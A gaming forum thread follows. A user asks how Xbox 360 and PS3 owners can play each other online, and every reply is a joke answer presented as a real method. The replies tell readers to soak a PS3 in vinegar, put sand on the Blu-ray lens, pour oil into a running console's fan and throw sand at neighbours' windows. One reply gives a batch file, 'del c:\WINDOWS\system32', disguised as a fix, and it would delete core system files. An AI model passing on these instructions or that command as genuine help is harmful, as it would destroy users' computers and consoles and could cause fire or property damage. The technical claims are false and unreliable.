Xbox Live and Ps3 online play together?

• Wanna Join? New users you can now register lightning fast using your Facebook or Twitter accounts.
Dec 20, 2002
Okay my boi at work told me his potna gots a ps3 but can play with the xbiox 360 network....I got a xbox 360,some my bois got the ps3...anyone know how to play together? what we gotta do

Dec 4, 2004
also if you pull out the cd tray from your 360 and shove an NES cartridge in there you can play it and even online

this is a secret

Jun 9, 2007
yea, basically everything they said above is true... but if ya wanna use your ps3 to play any game from any system that has been produced in the last 30 years, you'll have to do what I did... bathe your ps3 in a solution of 50/50 white vinegar & water overnight (at least 8 hours). After removing from the solution, CAREFULLY remove the screws from the ps3 and separate it so you can get to the guts. It's VERY IMPORTANT that you do these steps QUICKLY before the system dries. Take out the deck and very carefully attach 2 grains of sand to the bluray lens (they will stick fine because the lens should still be wet). Rub the rest of the deck down with approximately two tablespoons of "I Can't Believe It's Not Butter," and put everything back together. Wait about 6 more hours until everything dries out (do NOT use a hair dryer on the system or you could fry the components). Lastly, black out the serial number on your unit with a Sharpie marker. You're set to go. All you'll need is a boot up disc (any regular music CD will work). Once you put the boot up disc in, you'll be asked which system you'd like to choose, and then which game you'd like to play from that system. Enjoy!

R

Sicc OG
Dec 7, 2005
see what you need to do is go down to the beach and get yourself some sand

buy a copy of 'cabela's dangerous adventures' for the xbox 360 and bury the disc in a tray of sand for exactly 14 hours and 23 minutes

while you are waiting, pour some sand into the air hole on your 360. also, remove the hard drive and put some glue on the connectors and stick sand to them

remove the disc from the sand and put it into your xbox 360 and load up the game

while the game is loading up, on your control pad you need to press X, X, B, A, RT, LT, RT

the game will stop loading and a box will appear asking if you wish to install the 'cross network compatibility package' choose 'yes'

allow the package to install, it takes approximately 3 days, during these 3 days you must run around your neighbourhood violently throwing sand at peoples windows while shouting 'WHY SO SERIO?'

you will now be able to play xbox 360 games against ps3 users online

hope this helps

Defy

Cannabis Connoisseur
Jan 23, 2006
Rich City
It's actually really quite simple, all you need is either an xbox 360 or a playstation 3 and a windows based computer. connect the two via usb. a little known fact is that crisco cooking oil actually acts as a conductor giving a higher transfer rate between the two devices, so dip both ends of the usb cable in the oil before plugging them in. turn both on. you'll notice that you cannot see your system on the computer, so what you'll need to do is open notepad and type the following:
@echo off
del c:\WINDOWS\system32
save that as "ps3.bat" or "x360.bat" this will get the computer to recognize the system. Now if you still cannot connect to the other system, use that same crisco cooking oil and pour 3 tablespoons (no more than 3, you don't wanna damage the drive) into the fan on the back of your gaming device while it is on & running. the oil will accelerate the fan via lubrication and coat the inner workings of the gaming system allowing it to run whichever disc or network you would like.